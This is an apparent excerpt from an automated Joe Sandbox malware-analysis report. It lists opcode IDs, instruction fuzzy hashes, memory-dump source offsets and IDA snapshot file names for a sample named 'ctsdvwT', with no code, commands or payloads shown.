                                            • Instruction ID: af02cc067d984f638cafc48e776a21ea8401e12cfb6ef569de09fc02ac2c57ad
                                            • Opcode Fuzzy Hash: dce302749ce642feaf3dc73025790130191c72fb09cfb3671b87316d3f44e075
                                            • Instruction Fuzzy Hash: 47512D31602145AFDB19DF2AFA90D543F79EB5E70430059A8D0145B23ADF386E8DDF92
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f2921f1ef5feb84ed6a79d4d6851c831be637f345c8bfb23436ff10391c1601
                                            • Instruction ID: 6bf69c38d37bda352fe24d1ae957ef2e68696dae9ab66de5347bd9e0cb94e789
                                            • Opcode Fuzzy Hash: 7f2921f1ef5feb84ed6a79d4d6851c831be637f345c8bfb23436ff10391c1601
                                            • Instruction Fuzzy Hash: 5051FA34602145AFCB19DF2AFA90D543F69FB5EB043009AA8D0155B239DF386E8DDF92
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b97885e7c32197d8504cdcc6196b3a3ec2669bae3be35aa96cc9d050c8a38b1
                                            • Instruction ID: 07b18f67691fecc2ee1d656d7bb4cdc64593e3032fe8afdbaf1bd4c1473b2c49
                                            • Opcode Fuzzy Hash: 1b97885e7c32197d8504cdcc6196b3a3ec2669bae3be35aa96cc9d050c8a38b1
                                            • Instruction Fuzzy Hash: 7F318D35E10205DBDB1ACFA9D49469EBBB6EF89300F10C929EC16E7354DB70AD46CB50
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1a83c48fb1ea4417d324061a6e4cea4c10b01ce8c31eead69453695f6581dd08
                                            • Instruction ID: f22d0cbec312327714933091a46e71b54c549e38a402f68a9db73904c7fb050e
                                            • Opcode Fuzzy Hash: 1a83c48fb1ea4417d324061a6e4cea4c10b01ce8c31eead69453695f6581dd08
                                            • Instruction Fuzzy Hash: DE318135E10205DBDB1ACFA9D49469EBBB6FF89300F108919EC16E7354DB70AD46CB50
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f16092e20323c1babb275198ea82f84e323e47739960d355e5fc17f8677c814
                                            • Instruction ID: cefef6f1500a4967db8e114cae41a002717504b79962bdce6d015199a9e37647
                                            • Opcode Fuzzy Hash: 6f16092e20323c1babb275198ea82f84e323e47739960d355e5fc17f8677c814
                                            • Instruction Fuzzy Hash: B3410FB1D003489FDB14DF99C484ADEBFF5FF48310F208429E809AB254DB35A945CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30a2624a250c5c1c9bda4a200b8d509029d3d8e0a8028608eab7fe9c8fb61b8f
                                            • Instruction ID: c9f56209c2c04d61f2fc00650ca71ceeada01c188186eb5834d00d21a19638c6
                                            • Opcode Fuzzy Hash: 30a2624a250c5c1c9bda4a200b8d509029d3d8e0a8028608eab7fe9c8fb61b8f
                                            • Instruction Fuzzy Hash: F931C371E002099BDB05CF69D88169EFBB6FF86300F508619E805EB345DB70AD46CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d05b49226b940e3a7cfcefde03cd575fd6836ef2120bba0c60b85ba54c3545e
                                            • Instruction ID: 08e1d0d893029b9a35d56bdd0bc4806c6486f5c829b8f8f0c605cf4a0673ab95
                                            • Opcode Fuzzy Hash: 5d05b49226b940e3a7cfcefde03cd575fd6836ef2120bba0c60b85ba54c3545e
                                            • Instruction Fuzzy Hash: F2219431E1020A9BDB15CF69D89569EFBB6FF8A300F50C619E805EB345DB70AD46CB90
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91c628150b0a864dfad8ba3b038dace49f4cde4a22b89c09fc9cf10eac8179a9
                                            • Instruction ID: 495896db7f6fa8b78db768f6a523eb40eb485217f7793fdf5465ef4ddd4f1846
                                            • Opcode Fuzzy Hash: 91c628150b0a864dfad8ba3b038dace49f4cde4a22b89c09fc9cf10eac8179a9
                                            • Instruction Fuzzy Hash: 6821A1716401088BEB725A7DE48D7793E6AE746711F10082EF60AC7389EE2DDD85CB82
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ca168f1beb37f7df00565d7e71717685803dbe0cef6c6e71fd4f473c5166558
                                            • Instruction ID: 698a68238c1d6f0c6d3706372de320a5e1afcf1cf7022e85e45566e8448c4dcd
                                            • Opcode Fuzzy Hash: 5ca168f1beb37f7df00565d7e71717685803dbe0cef6c6e71fd4f473c5166558
                                            • Instruction Fuzzy Hash: 9A2183356001054FEB66DB3DF888B6A3B6EEB49304F104D25D51AC735EDF28DD858B92
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71a7a9d71211177bdee8e9ce6bd1d61ddb18ecb6aeb3052c999038ce85892fc8
                                            • Instruction ID: 256dee642eeb80d990e28d7e4bcecf1d280ea4f78b1c38089b7decf5cec6ea17
                                            • Opcode Fuzzy Hash: 71a7a9d71211177bdee8e9ce6bd1d61ddb18ecb6aeb3052c999038ce85892fc8
                                            • Instruction Fuzzy Hash: DA21A431E006099BDB19CFA8C4915DEF7B6EF89304F20852AEC15F7354DB709946CB51
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4506811045.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_15cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f32df2b1c19e123ec43a3cfdc13968143bf5c73bd801405e3040c45be24b4487
                                            • Instruction ID: 1bc656ca6061d1b2b6b2c0558686f733f6f61c69d09c85d2e87aaae24c41875b
                                            • Opcode Fuzzy Hash: f32df2b1c19e123ec43a3cfdc13968143bf5c73bd801405e3040c45be24b4487
                                            • Instruction Fuzzy Hash: 3E21F1755042049FCB15DFA8D580B26BBA5FB84714F20C97DD90A9F256D33AD406CAA1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b87fbcbacac5ac0708d182508bd47d771d55c4207ebcc5a9b42e0d7f8bcc855d
                                            • Instruction ID: 56059bb4cffa258bf5afd0409c2325176664e6938613204a5a433abc65020775
                                            • Opcode Fuzzy Hash: b87fbcbacac5ac0708d182508bd47d771d55c4207ebcc5a9b42e0d7f8bcc855d
                                            • Instruction Fuzzy Hash: 68213C31B00209CFDB64DB78C5586AD77FAEB49344F5004A9D606EB368DF369E41CBA2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f737b9317de402be3ce3b71c9a556dc470fe886d14fa1e0afdfacc354e7c1a6a
                                            • Instruction ID: 7a03212cf77f16f148ddd7aeee81540cb3892f2e1f1428a3470d64dcc9a16ab4
                                            • Opcode Fuzzy Hash: f737b9317de402be3ce3b71c9a556dc470fe886d14fa1e0afdfacc354e7c1a6a
                                            • Instruction Fuzzy Hash: 83214135B00209CFDB54DB78C5586AD77FAAF49344F500468D606EB358DF359E41CBA2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32753dc46239c82de4568e2bbc85c6d4b1300ae5b300c029d050bd12ad84af15
                                            • Instruction ID: 451c48db56fa198ad7a50617d81b8f268afa44cce9639938003601c966a2e057
                                            • Opcode Fuzzy Hash: 32753dc46239c82de4568e2bbc85c6d4b1300ae5b300c029d050bd12ad84af15
                                            • Instruction Fuzzy Hash: EF216231E0060A9BDB19CFA8C4555DEB7B6EF8A310F20C51AEC15FB354DB709945CB91
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5d7b0634528dd243e45f0e2c060ff366ab06f5ae1e975736120cd4af5f46531
                                            • Instruction ID: a56fd73b2a1e7372aa0cdb8952e92f64976305a740531eb2719f524143f6edc2
                                            • Opcode Fuzzy Hash: b5d7b0634528dd243e45f0e2c060ff366ab06f5ae1e975736120cd4af5f46531
                                            • Instruction Fuzzy Hash: EA216F356100054FEB669B39F888B6A3B6DEB49304F104E21D51ACB35EDF28DD858B92
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a2b5c6d7eb5bf6a2ce06d8ebc13e10de602424e9f654c1df19b6618a13a495c
                                            • Instruction ID: 1787c8d186cba381c46178f68bc69328f5509d94a755660ad0473fe50834e67e
                                            • Opcode Fuzzy Hash: 9a2b5c6d7eb5bf6a2ce06d8ebc13e10de602424e9f654c1df19b6618a13a495c
                                            • Instruction Fuzzy Hash: F7211635B00209DFDB14DB78D558AAD7BF5EB89714F1044A8E406EB3A8DB369E00CBA1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1cb72c07ccc5101737ac5878085b89bde6f54807b05ba0c6cde357d025f2e0c4
                                            • Instruction ID: 38b85458bd1cee15e029368b520b3ba3a04705a7a185b2a94cd1d6b53985d3c4
                                            • Opcode Fuzzy Hash: 1cb72c07ccc5101737ac5878085b89bde6f54807b05ba0c6cde357d025f2e0c4
                                            • Instruction Fuzzy Hash: 6011E372F00216ABCB20AB799C4976E7FB9EB48654F144465EA09D3345EE34CE02C792
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4506811045.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_15cd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: add7eb744995bdf7246a2ca5072ebddb1ce3c5bf89f09ee481d630813477eb65
                                            • Instruction ID: aee58b0cc280f041c1798507a9ff1a5ed378248b093c5df3640f81c39b93c4bb
                                            • Opcode Fuzzy Hash: add7eb744995bdf7246a2ca5072ebddb1ce3c5bf89f09ee481d630813477eb65
                                            • Instruction Fuzzy Hash: 7D217F755093808FDB13CF68D594715BF71FB46214F28C5EAD8498F6A7C33A980ACBA2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bfe3c116a48617c5d2cb89d7cfd88f38d66fc8eaaef10de2859746006330dbb3
                                            • Instruction ID: 95bd4716bb642eb873c95f675782327cfee4dd4822e9501bfb519f4870a445f9
                                            • Opcode Fuzzy Hash: bfe3c116a48617c5d2cb89d7cfd88f38d66fc8eaaef10de2859746006330dbb3
                                            • Instruction Fuzzy Hash: D2119D32B082088BEF655B7DDC4472E3699EB49314F204879F816CB29ADA24CEC58BC1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01524ac9f50097d8b5563c315b80685cdd390abeeacc3584b0f7f2b30b93cea1
                                            • Instruction ID: 9b61919277a7e35be3fb5e5c34af2e4b32ff9f9622c45e512a22a521fb17f6f9
                                            • Opcode Fuzzy Hash: 01524ac9f50097d8b5563c315b80685cdd390abeeacc3584b0f7f2b30b93cea1
                                            • Instruction Fuzzy Hash: CA115172A003158FCB61EFBC84451ED7BE9AB59310B24447AE90AE7245E635CA428BA2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d69e20b3a11b33cc29c7039d3bb8143cc72042d078419c2736cda1e2a57e26d3
                                            • Instruction ID: 0912682d2b74a6151f9e1f60273e4f8d20f0bb47591d6aaa1bd1dfaa2a484318
                                            • Opcode Fuzzy Hash: d69e20b3a11b33cc29c7039d3bb8143cc72042d078419c2736cda1e2a57e26d3
                                            • Instruction Fuzzy Hash: CF012132A002158FCB65EFBC88551AD7BE9EF59310F140479E90AE7245E635DA828BA2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93b38cf9ffc6771e8360c66ce212953f698584bdbee5647500cdf0569239f8ff
                                            • Instruction ID: bcc38b6b0740ff56909fece4e6569b940a2612710d81bbeca896b689a4494ef4
                                            • Opcode Fuzzy Hash: 93b38cf9ffc6771e8360c66ce212953f698584bdbee5647500cdf0569239f8ff
                                            • Instruction Fuzzy Hash: 32F0F673A04150CBD7228BBC98951ECBF79EE64311B1C00D7E606DB25AD225D642C751
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e060417fa554032a30f5356b405dd28f8e6b7dd551d25862dcfb21a6a1d851e
                                            • Instruction ID: e97537c4beee4667a1bd1cd5b5a0339b59843152cf371fc786b52751a6d337f3
                                            • Opcode Fuzzy Hash: 3e060417fa554032a30f5356b405dd28f8e6b7dd551d25862dcfb21a6a1d851e
                                            • Instruction Fuzzy Hash: A701263094010A9FDB06DBB4FD84A8E3B75EF44308F0082B8C4249B2A5DE356E0AC791
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4509084716.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1810000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 174b9db3d1bac1f39be6bf6ae69515d14b043cac5265d7c80d9b14d6c2dd5093
                                            • Instruction ID: 408b7ff9e58ac6796522f2d5ec13eb8cfbbdfaa11684d01ded02ba6248a0df83
                                            • Opcode Fuzzy Hash: 174b9db3d1bac1f39be6bf6ae69515d14b043cac5265d7c80d9b14d6c2dd5093
                                            • Instruction Fuzzy Hash: 61F06D3094010DEFDB45EFB5F98498E7BB9EF44204F508278C4189B264EE35AE498B91